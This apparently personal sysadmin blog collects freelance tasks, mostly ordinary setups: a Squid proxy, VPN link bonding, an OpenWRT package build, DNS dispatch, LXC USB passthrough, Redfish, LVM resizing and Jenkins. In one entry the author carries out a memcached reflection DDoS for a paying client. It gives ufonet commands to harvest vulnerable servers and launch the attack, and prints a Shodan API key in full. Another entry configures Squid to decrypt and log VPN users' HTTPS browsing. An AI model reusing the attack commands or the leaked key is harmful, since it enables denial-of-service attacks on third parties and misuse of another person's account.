Freelancer Task 4: Logging User Browsing History with Squid

This requirement was fairly simple: a user browsing log for an OpenVPN server. In short, users connect to his OpenVPN server and browse other sites through a Squid proxy on the same box; the special twist is that both HTTP and HTTPS browsing history must be visible. Squid runs as a transparent proxy, so it can capture the browsing log and provide caching at the same time. The server runs Ubuntu, and the stock Squid package is built without SSL support, so it has to be recompiled.

Install the build dependencies:

    sudo apt-get install build-essential fakeroot devscripts gawk gcc-multilib dpatch
    sudo apt-get build-dep squid3
    sudo apt-get build-dep openssl
    sudo apt-get install libssl-dev
    sudo apt-get source squid3

This fetches the Squid source plus Ubuntu's packaging patches. Unpack both:

    tar zxvf squid3_3.5.12.orig.tar.gz
    cd squid3-3.5.12
    tar xf ../squid3_3.5.12-1ubuntu7.5.debian.tar.xz

Edit the build parameters to enable SSL support:

    vi debian/rules

Add --with-openssl --enable-ssl --enable-ssl-crtd under the DEB_CONFIGURE_EXTRA_FLAGS section:

    DEB_CONFIGURE_EXTRA_FLAGS := BUILDCXXFLAGS="$(CXXFLAGS) $(LDFLAGS)" \
        ...
        --with-default-user=proxy \
        --with-openssl \
        --enable-ssl \
        --enable-ssl-crtd
        ...

Build; this produces seven .deb packages. ...
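Once the SSL-enabled build is installed, HTTPS interception itself is configured through ssl_bump. Below is a minimal squid.conf sketch for transparent bumping; the ports, CA certificate path, and helper paths are assumptions for illustration, not taken from the original task:

```
# intercept plain HTTP and TLS transparently (ports are assumptions)
http_port 3128 intercept
https_port 3129 intercept ssl-bump cert=/etc/squid/ssl_cert/myCA.pem

# dynamic certificate generation via ssl_crtd (enabled by --enable-ssl-crtd)
sslcrtd_program /usr/lib/squid/ssl_crtd -s /var/lib/ssl_db -M 4MB

# peek at the TLS ClientHello, then bump, so HTTPS requests appear in access.log
acl step1 at_step SslBump1
ssl_bump peek step1
ssl_bump bump all
```

With this in place, bumped HTTPS requests show up in access.log just like plain HTTP ones; clients must trust the generated CA certificate or they will see certificate warnings.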

January 24, 2024

Freelancer Task 5: A Multi-Link Bonding VPN

This task was interesting. The description:

    we need a set of vpn server / client programmed for embedded linux (or windows) to bond multiple 4g lte modems or wifi connectios and stitch them back together on server side to stream video feeds. the connection must be stable and have the maximum available bandwidth with no drop in some connection drops. simillar to service called SPEEDIFY (but it doesn't work well) this can be also achieved by splitting video packets and send them through different links and stitch the video packets back on the server side.

In short, the client side is very likely an embedded box—a Raspberry Pi, NanoPi, or the like—with several 4G modems attached, and he wants to bond the links to stream video upstream. ...
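The core mechanism the posting describes—splitting packets across links and stitching them back on the server—can be sketched in a few lines: tag each packet with a sequence number, round-robin it over whichever link is next, and reorder by sequence number on the far end. A toy illustration (in-memory lists stand in for real sockets; this is my sketch, not the client's code):

```python
import itertools

def split_stream(packets, num_links):
    """Tag each packet with a sequence number and round-robin it across links."""
    links = [[] for _ in range(num_links)]
    link_cycle = itertools.cycle(range(num_links))
    for seq, payload in enumerate(packets):
        links[next(link_cycle)].append((seq, payload))
    return links

def stitch(links):
    """Server side: merge packets from all links and restore original order."""
    merged = [pkt for link in links for pkt in link]
    merged.sort(key=lambda p: p[0])          # reorder by sequence number
    return [payload for _, payload in merged]

packets = [b"frame0", b"frame1", b"frame2", b"frame3", b"frame4"]
links = split_stream(packets, num_links=3)
assert stitch(links) == packets              # original order restored
```

A real implementation would add per-link health checks and retransmission, which is exactly the part the posting complains Speedify does not do well.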

January 24, 2024

Freelancer Task 6: Compile an ipk File on LEDE (OpenWRT)

This was a failed task—and even on a second attempt it would fail again, because there was no way to verify the result. Really shit; I was docked a $10 fee. Recording it here as a cautionary tale.

The task:

    Job would be to compile an ipk file of SHC that would work with LEDE OS (openwrt) and the processor used in our system - will provide details
    SHC can be downloaded here: http://www.datsi.fi.upm.es/~frosal/
    I think you must have a 64 bit system to use the SDK to compile the file

In short: compile SHC for the OpenWRT platform and make it work.

The complete steps follow.

How to compile SHC on LEDE. Tested build environment:

    OS: Ubuntu 14.04.5 LTS
    CPU: ARMv7 Processor rev 5 (v7l)

Before you begin, make sure your system is updated:

    sudo apt-get update
    sudo apt-get upgrade
    sudo apt-get autoremove

Step-by-step manual. Note: perform all steps as a regular (non-root) user; the user must be in the sudo group.

1. Update your sources:

    sudo apt-get update

2. Install the necessary packages:

    sudo apt-get install g++ libncurses5-dev zlib1g-dev bison flex unzip autoconf gawk make gettext gcc binutils patch bzip2 libz-dev asciidoc subversion sphinxsearch libtool sphinx-common libssl-dev libssl0.9.8

3. Get the latest LEDE SDK. We know our CPU is armv7, which falls under the arm64 target here, so go to http://downloads.lede-project.org/releases and just download the SDK:

    wget http://downloads.lede-project.org/releases/17.01.4/targets/arm64/generic/lede-sdk-17.01.4-arm64_gcc-5.4.0_musl-1.1.16.Linux-x86_64.tar.xz

4. No need to update and install all LEDE packages. We only want to compile shc, not other packages, so skip the feed update.

5. Run 'make menuconfig' (just Save and Exit).

6. Get the SHC sources into the LEDE package tree (run from the SDK directory, with shc-3.8.9b.tgz alongside):

    wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9b.tgz
    mkdir -p package/shc/src
    tar xvf shc-3.8.9b.tgz -C package/shc/src --strip-components 1

7. Write the ipk Makefile:

    vi package/shc/Makefile

    ##############################################
    # OpenWrt Makefile for the shc program
    #
    # Most of the variables used here are defined in
    # the include directives below. We just need to
    # specify a basic description of the package,
    # where to build our program, where to find
    # the source files, and where to install the
    # compiled program on the router.
    #
    # Be very careful of spacing in this file.
    # Indents should be tabs, not spaces, and
    # there should be no trailing whitespace in
    # lines that are not commented.
    ##############################################

    include $(TOPDIR)/rules.mk

    # Name and release number of this package
    PKG_NAME:=shc
    PKG_VERSION:=3.8.9b
    PKG_MAINTAINER:=Francisco Rosales <frosal@fi.upm.es>

    # This specifies the directory where we're going to build the program.
    # The root build directory, $(BUILD_DIR), is by default the build_mipsel
    # directory in your OpenWrt SDK directory.
    PKG_BUILD_DIR := $(BUILD_DIR)/$(PKG_NAME)

    include $(INCLUDE_DIR)/package.mk

    # Specify package information for this program.
    # The variables defined here should be self-explanatory.
    define Package/$(PKG_NAME)
        SECTION:=utils
        CATEGORY:=Utilities
        TITLE:=shc ---- generates a stripped binary executable version of the script specified at the command line
        URL:=http://www.datsi.fi.upm.es/~frosal
    endef

    define Package/$(PKG_NAME)/description
        shc ---- This tool generates a stripped binary executable version of the script specified at the command line.
    endef

    # Specify what needs to be done to prepare for building the package.
    # In our case, we need to copy the source files to the build directory.
    # This is NOT the default. The default uses PKG_SOURCE_URL and PKG_SOURCE
    # (not defined here) to download the source from the web; for sources we
    # already have locally it is much easier to do it this way.
    define Build/Prepare
        mkdir -p $(PKG_BUILD_DIR)
        $(CP) ./src/* $(PKG_BUILD_DIR)/
    endef

    # We do not need to define Build/Configure or Build/Compile directives;
    # the defaults are appropriate for compiling a simple program such as this one.

    # Specify where and how to install the program. Since we only have one file,
    # the shc executable, install it by copying it to /bin on the router. The $(1)
    # variable represents the root directory on the router running OpenWrt.
    # $(INSTALL_DIR) prepares the install directory if it does not already exist,
    # and $(INSTALL_BIN) copies the binary from the build directory into it.
    define Package/$(PKG_NAME)/install
        $(INSTALL_DIR) $(1)/bin
        $(INSTALL_BIN) $(PKG_BUILD_DIR)/shc $(1)/bin/
    endef

    # This line executes the necessary commands to compile our program. The
    # define directives above supply all the information, and BuildPackage
    # uses it to actually build the package.
    $(eval $(call BuildPackage,$(PKG_NAME)))

8. Compile the shc ipk:

    make package/shc/compile V=99

9. The build completes without errors. The binary package lands in:

    ./bin/packages/aarch64_armv8-a/base/shc_3.8.9b_aarch64_armv8-a.ipk

10. Copy the .ipk to the LEDE device and install it:

    scp shc_3.8.9b_aarch64_armv8-a.ipk root@<LEDE device IP address or name>:/tmp/
    ssh root@<LEDE device IP address or name>   # IP is usually 192.168.1.1
    opkg install shc_3.8.9b_aarch64_armv8-a.ipk

11. Create a test script and compile it (in the LEDE shell):

    ssh root@<LEDE device IP address or name>   # IP is usually 192.168.1.1
    vi /tmp/1.sh
        #!/bin/sh
        echo "hahahaha"
    shc -v -f /tmp/1.sh /tmp/1.sh.x

A few points to watch out for here. One is that there are many tutorials online that start by ...

January 24, 2024

Freelancer Task 7: A memcached Amplification Attack

This one nearly cost me money; in the end I got my fee back through a dispute, so I worked for nothing—rotten luck. A Korean client wanted a reflection attack.

First clone the project:

    git clone https://github.com/epsylon/ufonet

The principle is clear: through the memcached vulnerability—memcached astonishingly speaks UDP—you forge the source address and send a pile of requests to vulnerable memcached servers, triggering a reflection attack. Where does the pile of vulnerable machines come from? The Korean really did have a Shodan API key:

    0ptoLUtmkSJ8DbAvyZ8PevTRsyLoxEuN

and his account indeed turned up a pile of vulnerable machines.

Install Python:

    wget https://www.python.org/ftp/python/2.7.14/Python-2.7.14.tgz
    tar zxvf Python-2.7.14.tgz
    cd Python-2.7.14
    ./configure --prefix=/export/servers/Python2714
    make
    make install
    wget -O- "https://bootstrap.pypa.io/get-pip.py" | /export/servers/Python2714/bin/python
    /export/servers/Python2714/bin/pip install pycurl
    /export/servers/Python2714/bin/pip install geoip
    /export/servers/Python2714/bin/pip install whois
    /export/servers/Python2714/bin/pip install crypto
    /export/servers/Python2714/bin/pip install requests

First fetch a list of vulnerable machines:

    cd ufonet
    /export/servers/Python2714/bin/python ./ufonet --sd 'botnet/dorks.txt' --sa

Fire:

    /export/servers/Python2714/bin/python ./ufonet -a http://target.com -r 10000 --threads 2000

January 24, 2024

Freelancer Task 8: Per-Client DNS Dispatch for OpenVPN

The client posed a tricky one. He runs an OpenVPN server and two DNS servers—one with ad filtering, one without. The two DNS services live on the same machine on different ports, and he wanted to configure the OpenVPN clients so that different users get different DNS servers. After a long search, there is no client option to change the DNS port, so a workaround was needed.

The plan: give clients fixed IPs, then dispatch DNS queries to different upstreams based on source IP. I first wanted to use glider, written by a guy on V2EX, but after fiddling for ages I couldn't figure out the configuration—though it can certainly do the job, worst case by patching the Go code. glider is a full-blown proxy forwarder with chained proxies, very powerful. For speed I went with another guy's dns-dispatcher, which does exactly one thing: DNS dispatch.

Clone the dns-dispatcher code:

    git clone https://github.com/cathuhoo/dns-dispatcher

Build:

    make

Configure—we only set up UDP port 53, the standard DNS port:

    vi dns-dispatch.config

    ; This is a test configuration file
    [main]
    file_resolvers = resolvers.txt
    file_policy = policy.txt
    file_log = /var/log/dns-dispatch.log
    file_pid = /var/run/dns-dispatch.pid
    num_threads = 3
    service_port = 53
    #tcpservice_port = 53
    daemonize = yes

Configure the policy:

    vi policy.txt

    ip2 | * | Forward:bind2
    ip1 | * | Forward:bind1

Configure ip1 and ip2:

    vi ip1
    10.10.1.2

    vi ip2
    10.10.1.3

Configure bind1 and bind2—both DNS servers are on 10.10.1.1, on ports 5301 and 5302:

    vi resolvers.txt

    bind1|10.10.1.1|5301
    bind2|10.10.1.1|5302

Run:

    sudo ./dns-dispatch -c dns-dispatch.config

Done. All the configuration lives in files, and there are other usage modes—read the docs if you want to use it. ...
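The dispatch rule itself boils down to "source IP → upstream resolver". A minimal Python sketch of that lookup—the names and addresses mirror the config files above, but this is an illustration, not dns-dispatcher's actual code:

```python
# Map each upstream resolver name to (host, port), mirroring resolvers.txt.
RESOLVERS = {
    "bind1": ("10.10.1.1", 5301),
    "bind2": ("10.10.1.1", 5302),
}

# Map client source IPs to resolver names, mirroring policy.txt + ip1/ip2.
POLICY = {
    "10.10.1.2": "bind1",  # ip1 | * | Forward:bind1
    "10.10.1.3": "bind2",  # ip2 | * | Forward:bind2
}

def pick_resolver(client_ip, default="bind1"):
    """Return the (host, port) of the upstream resolver for a client IP."""
    return RESOLVERS[POLICY.get(client_ip, default)]

assert pick_resolver("10.10.1.2") == ("10.10.1.1", 5301)
assert pick_resolver("10.10.1.3") == ("10.10.1.1", 5302)
```

A real dispatcher wraps this lookup in a UDP listener on port 53 and relays each query to the chosen upstream; the fallback for unknown clients (here bind1) is my assumption.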

January 24, 2024

Passing a USB Device Through to an LXC Container

A QA colleague needed to install Android Studio on a test machine and debug a phone directly over adb. The trouble: the test machine is actually an LXC container, so the phone plugged into the host's USB port has to be passed through to the container. Here is how.

First run lsusb on the host to find the phone:

    [root@localhost]# lsusb
    Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
    Bus 002 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
    Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
    Bus 001 Device 014: ID 04e8:6860 Samsung Electronics Co., Ltd GT-I9100 Phone [Galaxy S II], GT-I9300 Phone [Galaxy S III], GT-P7500 [Galaxy Tab 10.1], GT-I9500 [Galaxy S 4]
    Bus 001 Device 004: ID 0624:0248 Avocent Corp. Virtual Hub
    Bus 001 Device 005: ID 0624:0249 Avocent Corp. Virtual Keyboard/Mouse

Look at the long line containing GT-I9100: ID 04e8:6860 is VendorID:ProdID, so Vendor=04e8 and ProdID=6860. Write those down. ...
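The original post is truncated here, but the usual continuation is to expose the USB bus to the container in its LXC config. A sketch in classic LXC 1.x/2.x key syntax—major number 189 is the kernel's fixed character-device major for /dev/bus/usb, while the container name in the path is an assumption:

```
# /var/lib/lxc/<container>/config
# allow USB character devices (major 189 = /dev/bus/usb) into the container's cgroup
lxc.cgroup.devices.allow = c 189:* rwm
# bind-mount the host's USB bus into the container so adb can see the phone
lxc.mount.entry = /dev/bus/usb dev/bus/usb none bind,optional,create=dir 0 0
```

After restarting the container, lsusb inside it should list the phone, and adb can pick it up.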

January 24, 2024

A First Look at Redfish on Dell iDRAC

Major motherboard vendors are all adopting Redfish, the next-generation out-of-band management standard. Dell's iDRAC management is actually quite good, so let's see how it supports Redfish.

First, see what the v1 root offers:

    curl -s "https://10.16.24.15/redfish/v1" -k -u root:xxxxxxxx | jq .

Result:

    {
      "@odata.context": "/redfish/v1/$metadata#ServiceRoot.ServiceRoot",
      "@odata.id": "/redfish/v1",
      "@odata.type": "#ServiceRoot.v1_1_0.ServiceRoot",
      "AccountService": {
        "@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/AccountService"
      },
      "Chassis": {
        "@odata.id": "/redfish/v1/Chassis"
      },
      "Description": "Root Service",
      "EventService": {
        "@odata.id": "/redfish/v1/EventService"
      },
      "Id": "RootService",
      "JsonSchemas": {
        "@odata.id": "/redfish/v1/JSONSchemas"
      },
      "Links": {
        "Sessions": {
          "@odata.id": "/redfish/v1/Sessions"
        }
      },
      "Managers": {
        "@odata.id": "/redfish/v1/Managers"
      },
      "Name": "Root Service",
      "Oem": {
        "Dell": {
          "@odata.type": "#DellServiceRoot.v1_0_0.ServiceRootSummary",
          "IsBranded": 0,
          "ManagerMACAddress": "50:9A:4C:82:B9:3F",
          "ServiceTag": "7Q9N8P2"
        }
      },
      "RedfishVersion": "1.0.2",
      "Registries": {
        "@odata.id": "/redfish/v1/Registries"
      },
      "SessionService": {
        "@odata.id": "/redfish/v1/SessionService"
      },
      "Systems": {
        "@odata.id": "/redfish/v1/Systems"
      },
      "Tasks": {
        "@odata.id": "/redfish/v1/TaskService"
      },
      "UpdateService": {
        "@odata.id": "/redfish/v1/UpdateService"
      }
    }

Quite a lot of services. Pick one branch and take a look:

    curl -s "https://10.16.24.15/redfish/v1/Chassis" -k -u root:xxxxxxxx | jq .

Result:

    {
      "@odata.context": "/redfish/v1/$metadata#ChassisCollection.ChassisCollection",
      "@odata.id": "/redfish/v1/Chassis/",
      "@odata.type": "#ChassisCollection.ChassisCollection",
      "Description": "Collection of Chassis",
      "Members": [
        {
          "@odata.id": "/redfish/v1/Chassis/System.Embedded.1"
        },
        {
          "@odata.id": "/redfish/v1/Chassis/Enclosure.Internal.0-1:RAID.Integrated.1-1"
        }
      ],
      "Members@odata.count": 2,
      "Name": "Chassis Collection"
    }

Next, session management: ...
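Walking the Redfish tree programmatically is just following @odata.id links. A small Python sketch that extracts the member links from a collection response like the Chassis one above—the HTTP call is left out, and the sample payload is inlined instead:

```python
import json

# Sample collection payload, shaped like the /redfish/v1/Chassis response above
chassis_json = """
{
  "@odata.id": "/redfish/v1/Chassis/",
  "Members": [
    {"@odata.id": "/redfish/v1/Chassis/System.Embedded.1"},
    {"@odata.id": "/redfish/v1/Chassis/Enclosure.Internal.0-1:RAID.Integrated.1-1"}
  ],
  "Members@odata.count": 2
}
"""

def member_links(collection):
    """Return the @odata.id of every member in a Redfish collection resource."""
    return [m["@odata.id"] for m in collection.get("Members", [])]

links = member_links(json.loads(chassis_json))
assert links[0] == "/redfish/v1/Chassis/System.Embedded.1"
```

In practice each returned link would be fetched with the same authenticated GET (curl or requests) to drill into the individual chassis resources.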

January 24, 2024

Resizing LVM Partitions

The filesystems are XFS, and the root volume ran out of space, so the volumes had to be resized. The sad part: XFS can only be grown, never shrunk, so a workaround is needed.

By default there are two LVM volumes:

    /dev/mapper/centos-root  40G
    /dev/mapper/centos-home  20G

The only option is to shrink the home volume and grow root. First back up /home, then shrink it to 2G:

    # yum -y install xfsdump
    # xfsdump -f /home.xfsdump /home
     please enter label for this dump session (timeout in 300 sec)
     -> home
     please enter label for media in drive 0 (timeout in 300 sec)
     -> home
    # umount /home
    # lvreduce -L 2G /dev/mapper/centos-home
    Do you really want to reduce home? [y/n]: y

Then grow the root volume:

    # lvextend -L +18G /dev/mapper/centos-root
    # xfs_growfs /dev/mapper/centos-root

Finally re-create the home filesystem and restore it:

    # mkfs.xfs -f /dev/mapper/centos-home
    # mount /home
    # xfsrestore -f /home.xfsdump /home

Done. ...
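The arithmetic behind the sizes deserves a sanity check: whatever shrinking home frees inside the volume group is exactly what root can be extended by. A trivial illustration (the function is mine, for illustration only):

```python
def resize_plan(home_gib, new_home_gib):
    """Space freed by shrinking home is what root can grow by (same VG)."""
    freed = home_gib - new_home_gib
    return {"lvreduce_home_to_gib": new_home_gib, "lvextend_root_by_gib": freed}

# 20G home shrunk to 2G frees 18G for root, matching the commands above
assert resize_plan(20, 2) == {"lvreduce_home_to_gib": 2, "lvextend_root_by_gib": 18}
```

Before running lvreduce, check with du that the data in /home actually fits in the new size, or the restore will fail.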

January 24, 2024

The F5 BIG-IP SSL Transactions Per Second (TPS) Limit

The company uses a wildcard SSL certificate and the whole site sits behind HTTPS, with an F5 in front doing SSL offload. Here comes the trouble: the F5's SSL Transactions Per Second (TPS) is limited by license. First check the license:

    tmsh show sys license detail | grep -i perf_SSL_total_TPS
      perf_SSL_total_TPS [500]

It shows 500. Then check how many cores there are:

    tmsh show sys tmm-info global | grep -i 'TMM count'
      TMM Count 4

Four cores, so the SSL TPS limit is 500 x 4 = 2000. Beyond 2000 you have to buy a bigger license.
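The capacity math is simply the licensed per-TMM value times the TMM count. Trivially, in Python (500 and 4 are the values read from tmsh above):

```python
def ssl_tps_limit(licensed_tps, tmm_count):
    """Total SSL TPS capacity = licensed TPS value x number of TMM cores."""
    return licensed_tps * tmm_count

# perf_SSL_total_TPS [500] and TMM Count 4, as read from tmsh above
assert ssl_tps_limit(500, 4) == 2000
```

Sustained traffic above this figure means upgrading the license, not adding configuration.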

January 24, 2024

Linking Two Jenkins Instances on Different Systems

The scenario: there are two Jenkins instances. One is a normal install on Linux; the other runs on macOS. The macOS one has Xcode and Android Studio installed and handles the automated ipa and apk packaging, while the Linux one is the main Jenkins, building many projects. Each machine's role is clear; the annoyance is having to log in back and forth to run builds. Is there a way to trigger a build on the second machine directly from the first? Of course—just send a token-authenticated URL to the second machine.

That is not the point of this post, though. The point: the source builds from Git, and with the Git Parameter plugin installed, Jenkins lets you pick a tag to build. If both machines do that, both end up doing a git checkout before building, which is pointless for the first machine. The main Jenkins only needs to list the tags in the Git project and pass the chosen tag to the second machine—no checkout required. The second machine, in turn, skips listing tags and checks out exactly the tag it was handed, which is the cheapest in resources.

So how do we make the first machine list tags only? Almighty Groovy:

    def gettags = "git ls-remote -t git@git.coding.net:doabc/app-abc.git".execute()
    def tags = []
    def t1 = []
    gettags.text.eachLine { tags.add(it) }
    for (i in tags)
        t1.add(i.split()[1].replaceAll('\\^\\{\\}', '').replaceAll('refs/tags/', ''))
    t1 = t1.unique()
    return t1

Note: the Groovy environment and the Git credentials both need to be configured in advance.
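Kicking off the downstream job is a single authenticated HTTP call to Jenkins' remote-trigger endpoint (buildWithParameters with a job token). A sketch that builds such a URL—the host, job name, and parameter names here are hypothetical placeholders, not from the original setup:

```python
from urllib.parse import urlencode

def build_trigger_url(base, job, token, **params):
    """Build a Jenkins remote-trigger URL: /job/<job>/buildWithParameters?token=...&..."""
    query = urlencode({"token": token, **params})
    return f"{base}/job/{job}/buildWithParameters?{query}"

# hypothetical macOS Jenkins host, job name, and tag parameter
url = build_trigger_url("http://macos-jenkins:8080", "app-abc-ios", "SECRET", tag="v1.2.0")
assert url == "http://macos-jenkins:8080/job/app-abc-ios/buildWithParameters?token=SECRET&tag=v1.2.0"
```

In practice the first Jenkins would GET or POST this URL (e.g. via curl) with the token configured under the downstream job's "Trigger builds remotely" option, passing the tag selected by the Groovy snippet above as the parameter.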

January 24, 2024